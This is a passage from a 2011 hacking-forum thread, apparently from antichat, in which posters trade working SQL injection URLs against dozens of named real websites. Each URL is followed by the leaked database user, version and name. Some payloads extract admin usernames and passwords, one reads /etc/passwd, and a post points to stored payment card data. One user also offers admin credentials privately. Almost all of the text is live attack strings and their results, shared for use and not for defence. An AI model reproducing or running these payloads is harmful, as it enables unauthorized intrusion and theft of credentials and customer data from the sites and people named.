http://www.stearnslending.com/about-us/news-item.php?id=-26+union+select+1,2,unhex(hex(concat_ws(0x3a,user( ),version(),database()))),(select(@x)from(select(@ x:=0x00),(select(0)from(information_schema.columns )where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,tab le_schema,0x2e,table_name,0x3a,column_name))))x),5 +--+
ROOT@FTP.CUPARTNERS.COM:5.0.18-NT:STEARNS_LENDING_V11081
http://contactusconsulting.com/en/Page_ID.php?IDTXT=-57'+union+select+(select(@x)from(select(@x:=0x00), (select(0)from(information_schema.columns)where(ta ble_schema!=0x696e666f726d6174696f6e5f736368656d61 )and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema ,0x2e,table_name,0x3a,column_name,0x20202020207c,u ser(),0x3a,version(),0x3a,database()))))x)+--+
consulting09@L40170.solusoftware.com:5.0.77:consul ting_dbo
COOLBOY007
27.07.2011, 14:50
Code:
http://lingedelit.ru/category.php?id=-8+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9+--+
lingedelit_ru@vps1996.vps.host.ru:5.0.90:lingedeli t_ru
PR 1
TIC 10
Code:
http://www.zareformu.ru/index.php?id=-5303+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5+--+
borodin-mokaru@localhost:5.0.51a-24+lenny4:law
PR 2
*uNkN0Wn*
27.07.2011, 15:17
PHP:
http://www.romefortravellers.com/content.php?sez=-eventi'+union+select+1,2,3,user(),5,6+--+
Code:
http://vl2.gallaudet.edu/staff.php?id=-40+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13+--+
5.0.51a-community-nt
PR 6
P.S. Files can be read...
COOLBOY007
27.07.2011, 21:31
Code:
http://www.proauto.ws/view.php?id=-1436+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6+--+
pux161_proauto@localhost:5.0.91-community:pux161_proauto
PR 2
TIC 10
Code:
http://www.microkino.ru/view.php?id=-214+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5+--+
microkino@localhost:5.0.70:microkino
PR 2
TIC 20
Code:
http://www.lestnicy.net/category.php?id=-84+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8+--+
lestnic4_borik@localhost:4.1.25-log:lestnic4_shop
PR 2
TIC 20
Code:
http://privatehotel.net.ua/order.php?ad=-305+union+select+concat_ws(0x3a,user(),version(),d atabase()),2,3,4,5,6,7+--+
sotrudnik_vert@localhost:5.1.40-log:sotrudnik_photel
Code:
http://avtounion.ru/news/article.php?id=-1040+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),version(),database()),8+--+
u109358@78.108.84.141:5.0.90:b109358
PR 2
TIC 50
Code:
http://www.intforus.ru/vuz-info.php?id=-15+union+select+concat_ws(0x3a,user(),version(),da tabase())+--+
portal@localhost:5.0.32-Debian_7etch12-log:cmiir
PR 1
TIC 20
Code:
http://copyright.net.au/buynow.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6--
PR 4
customer_order contains payment card info..
http://www.deitch.com/projects/slide_pop.php?imageId=2405+union+select+1,2,3,4,%2 8select%28@x%29from%28select%28@x:=0x00%29,%28sele ct%28null%29from%28information_schema.columns%29wh ere%28table_schema!=0x696e666f726d6174696f6e5f7363 68656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c6 2723e,table_schema,0x2e,table_name,0x3a,column_nam e%29%29%29%29x%29,6,7,8--&name=
HellFire
28.07.2011, 02:14
Code:
http://www.identitycrowd.com/buy_brands.php?category_id=1-0.1+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E ,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User() ,0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23--
Database Version: 5.0.92-community-log
Database name: identity_preview
User name: identity_ident@localhost
A shop for logos and some kind of pictures.
Code:
http://www.reggaefrance.com/player/videoplayer.php?num=1-0.1+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567 696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Us er(),0x7873716C696E6A656E64),4,5,6,7,8,9,10,11,12, 13--
Database Version: 5.0.44
Database name: rf_web
User name: reggaefr@localhost
French ragga for everyone, guys. ^^
Code:
http://www.andademiparte.com/cupon.php?id=-205'+union+select+1,2,3,concat_ws(0x3a,id,user,pas s),5,6,7,8,9,10,11,12,13,14+from+usuarios+--+
5.5.8-log
PR 3
HellFire
28.07.2011, 06:14
Code:
http://www.technique-extreme.com/english/sommaire_produits.php?num_sommaire=1-0.1+UNION+SELECT+1,2,3,4,5,CONCAT(0x7873716C696E6A 626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2 A2F,User(),0x7873716C696E6A656E64),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23--
Database Version: 5.0.77
Database name: dbtechniqueextreme
User name: web12500@localhost
Some crappy ski shop.
Code:
http://citya.com/actualites.php?num_actu=1-0.1+UNION+SELECT+1,CONCAT(0x7873716C696E6A62656769 6E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User (),0x7873716C696E6A656E64),3,4,5,6,7,8,9--
Database Version: 5.0.51a-24+lenny2-log
Database name: site_citya
User name: citya@citya1.ics.infoclip.fr
French real estate.
Code:
http://www.oswaldspharmacy.com/product.php?id=1-9999999.99999+UNION+SELECT+1,CONCAT(0x7873716C696E 6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2 A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9--
Database Version: 5.0.77-log
Database name: 360851_oswalds
User name: 360851_admin@172.16.16.54
Yankee pharma.
COOLBOY007
28.07.2011, 15:21
Code:
http://www.genichesk.com.ua/album/view.php?id=-554+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4+--+
u_genichesk@localhost:5.0.51a-15:genichesk
PR 3
TIC 50
Code:
http://www.stroytechmarket.ru/order.php?id=721&pid=146%20and%28select%201%20from%28select%20count %28*%29,concat%28%28select%20%28concat_ws%280x3a,u ser%28%29,version%28%29,database%28%29%29%29%20fro m%20%60information_schema%60.tables%20limit%200,1% 29,floor%28rand%280%29*2%29%29x%20from%20%60inform ation_schema%60.tables%20group%20by%20x%29a%29%20a nd%201=1
stroytec_db@localhost:5.1.44:stroytec_db1
PR 3
TIC 20
Code:
http://www.ilcanecorso.ru/dogs/view.php?id=-8+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6+--+
ilcaneco@89.111.176.105:4.1.25-log:wwwilcanecorsoru
PR 3
TIC 60
Code:
http://www.ghkandt.com/order.php?id=-9%20and%28select%201%20from%28select%20count%28*%2 9,concat%28%28select%20%28concat_ws%280x3a,user%28 %29,version%28%29,database%28%29%29%29%20from%20%6 0information_schema%60.tables%20limit%200,1%29,flo or%28rand%280%29*2%29%29x%20from%20%60information_ schema%60.tables%20group%20by%20x%29a%29%20and%201 =1
ghkandtc1@localhost:5.1.28-rc:ghkandtc11
PR 3
TIC 60
Cennarios
29.07.2011, 01:02
Lovely )))
http://www.unidir.org/bdd/fiche-article.php?ref_article=-2759+union+select+1,2,3,4,user%28%29,6,7,8,9,10,11 ,12,13,14,15,16,17--+
*uNkN0Wn*
29.07.2011, 13:51
PHP:
http://www.asiademocracy.org/content_view.php?section_id=-11+union+select+1,user(),3,4+--+
VERSION : 5.1.58-community-log
DATABASE : sghumanr_arda
USER : sghumanr_arda@localhost
PR - 4
PHP:
http://www.manilawater.com/section.php?section_id=2+union+select+1,2,3,concat (database(),char(59),version(),char(59),user()),5, 6,7,8,9,10+--+
DATABASE : db123289_manilawater
VERSION : 5.1.55-rel12.6
USER : db123289_erik@205.186.176.17
COOLBOY007
29.07.2011, 15:46
Code:
http://www.indexcopernicus.com/info.php?id=6%20and%28select%201%20from%28select%2 0count%28*%29,concat%28%28select%20%28concat_ws%28 0x3a,user%28%29,version%28%29,database%28%29%29%29 %20from%20%60information_schema%60.tables%20limit% 200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60 information_schema%60.tables%20group%20by%20x%29a% 29%20and%201=1
User: panel@ic-i_fire-ny.indexcopernicus.com
Version: 5.0.26-Max-log
Database: indexcoper
PR 6
TIC 20
*uNkN0Wn*
29.07.2011, 18:02
PHP:
http://www.omlxi.com/project.php?php_ex=-1+union+select+concat(database(),char(59),version( ),char(59),user())+--+
VERSION : 5.1.58-community-log
DATABASE : omlxicom_work
USER : omlxicom_wrkuser@localhost
PR - 2
Output appears in the title
PHP:
http://sanovide.com/diet_subcategory.php?sub_cat_id=-17+union+select+1,concat(database(),char(59),versi on(),char(59),user()),3,4,5,6,7,8,9+--+
VERSION : 5.0.77
DATABASE : Sanovide
USER : Sanovide@Localhost
PR - 2
PHP:
http://www.mysoutherntier.com/view_bus_cats.php?sub_cat_id=-152+union+select+1,concat(database(),char(59),vers ion(),char(59),user()),3+--+
VERSION : 5.1.56
DATABASE : mysouthe_mysoutherntier
USER : mysouthe_mysouth@localhost
PR - 2
Output appears in the title
Osstudio
29.07.2011, 22:03
Code:
http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex%28he x%28concat%28user_name,0x3a,user_pass%29%29%29,3,4 ,5,6+from+user--+
TIC: 10
PR: 1
Code:
http://www.yorkshirecoastcollege.ac.uk/news.php?id=479+and+(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +(select+1+union+select+2+union+select+3)x+group+b y+2+limit+1)a)
TIC: 0
PR: 6
Code:
http://rumafia.com/ru/news.php?id=-214+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16+--+
TIC: 20
PR: 3
Code:
http://goldenformula.net/news.php?id=48+and+1=0+union+select+1,2,3,4,versio n%28%29,6--
TIC: 100
PR: 4
PHP:
http://www.frontviewsgallery.de/exhibition.php?exhibition_id=6+union+select+1,vers ion%28%29,3,4,5,6,7,8,9,10,11--
Osstudio
30.07.2011, 00:12
Code:
http://www.astrakhanfm.ru/news/news.php?id=27341+and+1=0+union+select+1,version%2 8%29,database%28%29,4,user%28%29,6,7--
TIC: 200
PR: 5
COOLBOY007
30.07.2011, 00:18
Code:
http://www.glimz.net/info.php?individual=4603%20and%28select%201%20from %28select%20count%28*%29,concat%28%28select%20%28c oncat_ws%280x3a,user%28%29,version%28%29,database% 28%29%29%29%20from%20%60information_schema%60.tabl es%20limit%200,1%29,floor%28rand%280%29*2%29%29x%2 0from%20%60information_schema%60.tables%20group%20 by%20x%29a%29%20and%201=1
User: glimz_net@srv11.one.com
Version: 5.0.51a-24+lenny5-log
Database: glimz_net1
PR 5
TIC 10
Osstudio
30.07.2011, 00:21
Code:
http://ngfrussia.ru/news.php?id=524+and+1=0+union+select+1,database%28 %29,version%28%29,4,5,6,7,8,9,10--
DataBase: ngf
Version DB: 5.0.77
User BD: leni@localhost
TIC: 40
PR: 3
Code:
http://www.chexov.net/news.php?id=571+union+select+user%28%29,database%2 8%29,3,4,version%28%29,6+--+
DataBase: u155206
Version DB: 5.0.77-log
User BD: u155206@localhost
TIC: 4
PR: 3
P.S. See the comments
Code:
http://www.hellolulu.com/group.php?cat1_id=-1+union+select+1,2--
http://www.hellolulu.com/admin/
PR: 2
version: 5.0.45
user: hellolul@localhost
database: hellolul01
COOLBOY007
30.07.2011, 15:00
Code:
http://bwd.eea.europa.eu/kml_export.php?cc=' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),da tabase()),10,11,12,13,14,15,16,17,18,19,20 and 'x'='x
User: bwdfull@localhost
Version: 5.0.77
Database: bwd
PR 9
TIC 4800
P.S. A vulnerability has already been found (https://antichat.live/showpost.php/p/1936892/postcount/11543/) on this site, but on a different subdomain with a different DB.
Osstudio
30.07.2011, 16:15
Code:
http://fishres.ru/news/news.php?id=14572+and+1=0+union+select+1,2,user%28 %29,version%28%29,5,6,7,8,database%28%29--
DataBase: murfish4_test
Version DB: 4.0.27-log
User BD: murfish4_test@v28.valuehost.ru
TIC: 600
PR: 3
Code:
http://www.civilista.ru/news.php?id=22+and+1=0+union+select+1,2,0x4861636b 6564204279204f7373747564696f212121,version%28%29,5 ,database%28%29,7--
DataBase: u9620_civilista_ru
Version DB: 5.0.89-log
User BD: u9620@be2
TIC: 20
PR: 2
P.S. Note the title
{
Current DB: u9620_civilista_ru
Data Base Found: information_schema
Data Base Found: u9620
Data Base Found: u9620_biruk
Data Base Found: u9620_cb
Data Base Found: u9620_civilista
Data Base Found: u9620_civilista_ru
Data Base Found: u9620_mediator
Data Base Found: u9620_mucb
Data Base Found: u9620_prav66
Data Base Found: u9620_prav66_forum
Data Base Found: u9620_privlaw
Data Base Found: u9620_zagovor
Data Base Found: u9620_zhurnal
Data Base Found: u9620_zhurnal_new
Enter our site at http://2ip.ru/domain-list-by-ip/ and we get the sites that belong to these databases.
}
Code:
http://kolesaonline.ru/news.php?id=66+and+1=0+union+select+1,version%28%2 9,database%28%29,user%28%29,5,6--
DataBase: kolesa
Version DB: 4.1.25-log
User BD: kolesa-sql@localhost
ТИЦ: 120
PR: 2
Code:
http://www.fauna-servis.ua/news.php?id=407+and+1=0+union+select+1,2,0x4861636 b6564204279204f7373747564696f2121,4,5,6,concat_ws% 280x3a3a3a,user%28%29,database%28%29,version%28%29 %29,8,9,10,11,12--
DataBase: faunaservis
Version DB: 5.0.51a-24+lenny5
User BD: u_faunaservi@localhost
ТИЦ: 50
PR: 3
Osstudio
30.07.2011, 17:37
Code:
http://www.rody18.spb.ru/news.php?id=51+and+1=0+union+select+1,2,0x59612076 65726e756c73796121,concat_ws%280x3a3a3a,user%28%29 ,database%28%29,version%28%29%29,5,6,7,0x3a44--
DataBase: db00143987
Version DB: 4.1.25-log
User BD: 00143987@localhost
ТИЦ: 30
PR: 3
COOLBOY007
30.07.2011, 18:41
Code:
http://n-europe.eu/content/index.php?p=1262%20and%28select%201%20from%28selec t%20count%28*%29,concat%28%28select%20%28concat_ws %280x3a,user%28%29,version%28%29,database%28%29%29 %29%20from%20%60information_schema%60.tables%20lim it%200,1%29,floor%28rand%280%29*2%29%29x%20from%20 %60information_schema%60.tables%20group%20by%20x%2 9a%29%20and%201=1
User: u3249_old@localhost
Version: 5.1.57-rel12.8
Database: u3249_old1
PR 6
тИЦ 300
P.S. Look at the page source; the error is commented out.
http://www.mbzspeciesconservation.org/includes/get-data/getCountries.php?countryCode=-4+union+select+1,2,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x)--
http://www.atic.ae/ar/media-center/generate-html-Ar.php?id=483+union+select+1,2,0x323030302d30312d3 031,4,5,6,7,8,9,0,(select(@x)from(select(@x:=0x00) ,(select(null)from(information_schema.columns)wher e(table_schema!=0x696e666f726d6174696f6e5f73636865 6d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sc hema,0x2e,table_name,0x3a,column_name))))x)--
*uNkN0Wn*
30.07.2011, 20:33
PHP:
http://www.angstromloudspeakers.com/item_list.php?sub_cat_id=-149+union+select+concat(database(),char(59),versio n(),char(59),user())+--+
VERSION : 4.1.22-standard
DATABASE : angstrom_sysdata
USER : angstrom_u0708@localhost
PR - 3
PHP:
http://www.aquaticdepot.net/sub_category_desc.php?sub_cat_id=-8+union+select+1,2,concat(database(),char(59),vers ion(),char(59),user()),4,5,6+--+
VERSION : 5.0.91-log
DATABASE : db264189880
USER : dbo264189880@74.208.16.36
PHP:
http://www.medicaltourismmag.com/detail.php?Req=199+union+select+1,2,3,4,5,6,7,8,9, 10,11,concat(database(),char(59),version(),char(59 ),user()),13,14,15,16,17+--+
VERSION : 5.0.92-community-log
DATABASE : medicalm_mtm
USER : medicalm_mtm@localhost
PR - 4
PHP:
http://www.greyblue.net/MidnightBlue/story.php?storyid=-2+union+select+1,2,concat(database(),char(59),vers ion(),char(59),user()),4,5,6,7,8+--+
VERSION : 5.1.53-log
DATABASE : greyblue
USER : greybluedbuser@seahawks.dreamhost.com
PR - 1
PHP:
http://www.thecardchest.com/sid/viewStory.php?storyID=-243+union+select+1,2,concat(database(),char(59),ve rsion(),char(59),user()),4+--+
VERSION : 5.0.77
DATABASE : sid
USER : sidUser@localhost
PR - 3
Osstudio
30.07.2011, 20:36
Code:
http://www.club-crosswind.com/news.php?id=161+and+1=0+union+select+1,2,3,4,5,6,0 x4861636b6564206279204f7373747564696f212121,concat _ws%280x3a3a3a,user%28%29,database%28%29,version%2 8%29%29--
DataBase: clubcrosswindcom
Version DB: 5.0.51a-24+lenny4-log
User BD: clubcrosswindcom@localhost
ТИЦ: 40
PR: 4
Code:
http://vniisubtrop.ru/news.php?id=1+and+1=0+union+select+1,2,version%28% 29,4,5,6,7,database%28%29--
DataBase: gb_vnii
Version DB: 5.0.54-log
User BD: gb_vnii@81.176.226.188
ТИЦ: 20
PR: 2
Cennarios
31.07.2011, 22:17
http://www.safmuseum.org/pages/bio.php?id=-70%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,version%28%29,23,24,25,26,2 7--+from+admins--+.html
And a bit more cr*p:
http://www.starkeyhearingfoundation.org/post-event.php?id=-41+union+select+1,2,3,4,5,6,7,8,user%28%29,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
Osstudio
01.08.2011, 19:46
Code:
http://www.noutov.info/news.php?id=7+and+1=0+union+select+1,2,version%28% 29,database%28%29,5,6,7--
DataBase: dbeuronout
Version DB: 4.0.26-log
User BD: noutov@localhost
ТИЦ: 30
PR: 2
COOLBOY007
01.08.2011, 20:53
Code:
http://www.stella-science.eu/initiatives_view.php?id=710 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: stella@localhost
Version: 5.0.77-log
Database: stella1
PR 5
Code:
http://www.burko.eu/index.php?id=22.2%20union%20all%20select%20concat_ ws%280x3a,user%28%29,version%28%29,database%28%29% 29+--+
User: root@localhost
Version: 5.1.56
Database: today
PR 1
SQLI
Code:
_http://uventa-spb.ru/index.php?new=1+union+select+1,2,username,4,5,6,7, 8,8+from+z102451_uventa.jv_users+where+id=1+--+
5.1.49-3-log
z102451_uventa
z102451_uventa@77.221.130.24
==================================================
BSQLI
Code:
_http://ruselt.ru/news.php?id=1&page=191+union+select+1,2,3,4,5,6,7,8+--+
5.0.90-log
u33206
u33206@10.8.1.176
==================================================
SQLI
Code:
_http://www.lyceumtheatre.org/production.php?id=1+union+select+1,2,3,4,5,6,7,8,9 ,1,2,3,4,5,6,7,8,9,1,1,1,1+--+
5.0.51a-3ubuntu5.1
lyceumtheatre
testlyceum@localhost
COOLBOY007
01.08.2011, 22:47
stranger1341 said:
www.sklepy-online.pl/?exec=showscat&id=51'
help me find the login and password for the admin panel
stranger1341, PM me for the admin data.
Code:
http://www.sklepy-online.pl/?exec=showscat&id=51.1'+union+select+concat_ws(0x3a,user(),versio n(),database()),2+and+'x'='x
User: sql_arteesoft13@localhost
Version: 5.1.49-3
Database: sql_arteesoft13_so
PR 4
Cennarios
02.08.2011, 00:19
http://www.census.gov/ces/whatsnew/newsarchive.php?more=-10+union+select+1,2,3,4,5,6--+
Osstudio
02.08.2011, 15:24
Code:
http://www.prokitetour.com/news.php?id=185%27+and+1=0+union+select+1,2,3,vers ion%28%29,database%28%29,user%28%29,7,8+--+
DataBase: db271821761
Version DB: 5.0.77
User BD: db271821761@localhost
ТИЦ: 20
PR: 4
*uNkN0Wn*
02.08.2011, 16:25
PHP:
http://www.copycentral.com/location.php?lid=-9+union+select+1,2,3,concat(database(),char(59),ve rsion(),char(59),user()),5,6,7,8,9,10,11,12,13,14+--+
VERSION : 5.0.91-log
DATABASE : copycent_data
USER : copycent_data@72.167.232.72
PR - 4
http://www.itkor.ru/cnews/index.phtml?dt=-731%20union%20select%201,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),3%20--
4.1.22-standard itkorru_adm@localhost itkorru_market unknown-linux-gnu
COOLBOY007
03.08.2011, 14:00
Code:
http://www.agendafin.com/article.php?ID=94.9 union all select 1,concat_ws(0x3a,user(),version(),database()),3,4, 5,6,7,8+--+
User: 27629@62.73.58.147
Version: 5.0.51a-24+lenny5
Database: db27629
PR 4
Code:
http://www.hitnews.eu/index.php?id=43.9 union all select 1,2,concat_ws(0x3a,user(),version(),database())+--+
User: hitmans@localhost
Version: 4.1.22
Database: hitnews2
PR 4
тИЦ 10
Code:
http://www.museumofconflict.eu/singletext.php?id=9.9' union all select 1,concat_ws(0x3a,user(),version(),database()),3,4, 5,6 and 'x'='x
User: nuke290@localhost
Version: 4.1.22
Database: MC
PR 4
winstrool
03.08.2011, 14:42
http://www.ilada.ru/catalog.php?tovid=-85+UnIon+selECt+concat_ws(0x3a,user(),version(),da tabase())+--+
list43_lada@v29.valuehost.ru:4.0.27-max-log:list43_lada
http://www.rockstore.ru/catalog.php?modul=goods&group=418&id=-3825+UnIon+selECt+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,10,11,12+--+
dbu_soultek7_1@192.168.6.37:5.0.77-log:db_soultek7_4
http://www.momo.it/products.php?id_cat=1&id_subcat=1&id_product=-4'+UnIon+selECt+1,2,3,4,5,6,concat_ws(0x3a,user(), version(),database()),8,9,10,11,12,13,14,15+--+
momoit_db@localhost:5.0.51a-24+lenny5:momoit_momoitdb
http://www.georgeturnermodels.com/index.php?page=shopping&shop_cat_id=5'+union+select+1,2,3,4,concat_ws(0x3a ,user(),version(),database()),6,7+--+
web227-gtm@localhost:5.1.56-community-log:web227-gtm
http://www.komiks.cz/clanek.php?id=-270'+UnIon+selECt+1,2,3,4,concat_ws(0x3a,user(),ve rsion(),database()),6,7,8,9,10,11,12,13,14,15+--+
a3003_komiks@10.28.8.5:5.5.9:d3003_komiks
http://www.magnit.dp.ua/show_cat.php?catid=-5+/*!%75nion+%73elect*/+1,concat_ws(0x3a,user(),version(),database()),3,4 ,5,6,7,8++--+
magnitd_magnit@trio.hosted.in:5.0.91:magnitd_magni t
http://www.islinc.com/Cyber_Security_Evaluations/nist_glossary.php?id=1'+union+select+(select(@x)fr om(select(@x:=0x00),(select(0)from(information_sch ema.columns)where(table_schema!=0x696e666f726d6174 696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3 c62723e,table_schema,0x2e,table_name,0x3a,column_n ame))))x),2+--+
glassfis_isl@208.76.193.150:5.0.92-community:glassfis__ISL_CyberSecurity
http://www.novocor-group.ru/cat_item.php?sid=92+union+select+concat_ws(0x3a,us er(),version(),database()),2+--+
novocor@zvm8.host.ru:4.0.27-log:novocor
http://www.orenskidki.ru/page_id.php?id=886+union+select+1,2,concat_ws(0x3a ,user(),version(),database()),4,5+--+
skidki@localhost:5.1.41-3ubuntu12.10:skidki
Code:
http://www.roshinskiy.ru/page.php?id=24%27+or+1+group+by+concat%28user%28%2 9,version%28%29,database%28%29,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+
User:malishasti_rosh@localhost
Database:malishasti_rosh
Version:5.0.26-log
PR:1
тИЦ:20
Cennarios
04.08.2011, 03:19
http://www.ait.com/searchdetails.php?cid=-920%27+union+select+1,version%28%29,3,4,5,6,7,8,9, 10--+
http://old.cageprisoners.com/articles.php?id=-25632+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),ver sion(),database()),5,6#
cagepris_user@localhost:5.0.84:cagepris_cms
Яндекс тИЦ: 10
Google PageRank: 5/10
Code:
http://fond.jazzandclassic.ru/need_help.php?id=-34+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13+--+
БЛАГОТВОРИТЕЛЬНЫЙ ФОНД ПОДДЕРЖКИ КУЛЬТУРЫ И МИЛОСЕРДИЯ «ДЖАЗ И КЛАССИКА»
5.0.90-log
тИЦ 20
PR 4
Code:
http://www.tinos-tinos.com/destination.php?destinationid=-246+union+select+1,2,3,concat_ws(0x3a,id,user,pass ,email),5+from+faqAdmin+--+
5.1.41-3ubuntu12.10-log
PR 3
--
Code:
http://www.genomics.cn/en/platform.php?id=-67+union(select+concat_ws(0x3a,username,password), 2,3,4,5+from+cms_users+limit+1,1)+--+
5.0.77-log
тИЦ 20
PR 6
Code:
http://www.worstpreviews.com/moviereviews.php?id=-266+union+select+version(),2+--+
5.1.56-log
тИЦ 120
PR 5
Code:
http://www.kayafm.co.za/features.php?id=-47+union+select+1,version(),3,4,5,6,7,8,9+--+
5.0.92-community
PR 5
winstrool
05.08.2011, 18:42
http://www.little-boy.ru/catalog.php?season=-3+union+select+(select(@x)from(select(@x:=0x00),(s elect(0)from(information_schema.columns)where(tabl e_schema!=0x696e666f726d6174696f6e5f736368656d61)a nd(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0 x2e,table_name,0x3a,column_name))))x)+--+
littlebo_littboy@localhost:5.1.56-log:littlebo_cat
http://www.salaam.co.uk/links/show_links.php?sub_cat_id_link=289+union+select+ve rsion()||chr(58)||current_user||chr(58)||current_d atabase()+#+--+&main_cat_id_link=157
PostgreSQL 8.1.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20070105 (Red Hat 4.1.1-52):custdb:salaam
http://c-sklad.ru/contact.html?id=-1+UnIon+selECt+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,load_file(0x2f6574632f70617 3737764),(select(@x)from(select(@x:=0x00),(select( 0)from(information_schema.columns)where(table_sche ma!=0x696e666f726d6174696f6e5f736368656d61)and(0x0 0)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,ta ble_name,0x3a,column_name))))x),11+--+
csklad@localhost:5.1.46:csklad
http://blog.evpetrov.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1133')%20UNION%20ALL%20SELECT%201,2,user()--%20
http://amp.genomics.org.cn/markerDetail.php?ID=3-AP002039-2773'+and+1=2+union/**/select+1,2,3,4,5,6,7,8,user(),0,version(),12,13,14 ,15,16,17,18,'19
http://www.metalac.com/pgs/sr/press/?year=2011&month=05&newsid=-148+union+select+1,2,3,4,5,(select(@x)from(select( @x:=0x00),(select(null)from(information_schema.col umns)where(table_schema!=0x696e666f726d6174696f6e5 f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e ,table_schema,0x2e,table_name,0x3a,column_name)))) x),7,8,9--
Chambers Bank
Code:
http://www.chambers-bank.com/service_details.php?id=-11+union+Select+1,2,group_concat(column_name),4,5, 6+from+information_schema.columns+where+table_name =0x6c6f636174696f6e73
version: 5.0.77-LOG
database: CHECKIN_DB
user: CHECKIN_ADMIN@208.38.137.5
Code:
http://pregled-rs.com/products2.php?id=-1+union+Select+1,concat_ws(0x3a,version(),database (),user())+--+
version: 5.0.45
database: ys2
user: ys2@localhost
Code:
http://www.mobilesfever.com/softwares/softwares_category.php?id=-1+union+Select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12+--+
version: 5.0.92-community-log
database: mobilesf_soft
user: mobilesf_soft@localhost
Code:
http://www.alians-auto.ru/index.php?mode=content&id=-1+union+Select+1,2,group_concat(table_name+separat or+0x3a3a),4,5,6+from+information_schema.tables+wh ere+table_schema=0x616c69616e735f6e657773+--+
version: 5.0.51a-log
database: alians_news
user: alians_news@217.112.35.43
Code:
http://hist.web.tstu.ru/prepod.php?id=-1+union+Select+1,concat_ws(0x3a,version(),database (),user()),3,4+--+
version: 5.1.50-MariaDB
database: hist
user: hist@localhost
Code:
http://www.isleofdogs.ru/catalog.php?id=-2+union+Select+concat_ws%280x3a,version%28%29,data base%28%29,user%28%29%29+--+
version: 5.0.70-log
database: gb_isleofdogs
user: gb_isleofdogs@10.0.2.7
Code:
http://www.playonline.com.ua/game.php?id=-978%29%20union%20select%201,2,concat_ws%280x3b,use r%28%29,version%28%29,database%28%29,@@version_com ment,SESSION_USER%28%29,CURRENT_USER%28%29,SYSTEM_ USER%28%29,@@version_compile_machine,@@version_com pile_os,@@basedir,@@datadir,@@tmpdir%29,4,5,6,7,8, 9--+
user: dvdpoisk_pl@localhost
database: dvdpoisk_pl
version: 5.0.51a-community
Code:
http://www.supraten.md/ru/contacte.php?menu_id=6&id_contact=-5+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.columns+where+table_name=0x75 736572--
user: supraten@localhost
database: sablon01
version: 5.0.51b-community-nt-log
Code:
http://www.aviaportal.ru/news.php?newsid=1826+union+select+1,concat_ws(0x0b ,username,passwd),3,4,5+from+user+limit+1,1/*
user: m13977@fhe2.hoster.ru
database: db13977m
version: 4.0.27-log
Code:
http://www.crc.uri.edu/about.php?about_id=-3+union+select+1,2,3,concat%28user%28%29,0x3a,data base%28%29,0x3a,version%28%29%29,5,6--
PR: 6
version: 4.1.22
user: root@winooski.crc.uri.edu
database: crcweb
Code:
http://www.biomatworld.com/about_us.php?about_ID=-1+union+select+1,concat%28user%28%29,0x3a,database %28%29,0x3a,version%28%29%29,3,4,5--
PR: 1
version: 5.1.58
user: biomatwo_cwadmin@localhost
database: biomatwo_cart
Code:
http://www.abrasivesthailand.com/aboutus.php?about_id=-2+union+select+1,2,3,concat(mem_email,0x3a,mem_pas s),5,6,7,8,9,10+from+member+limit+0,1--
PR: 3
version: 5.0.90
user: abrasives@localhost
database: abrasivesthailand
Code:
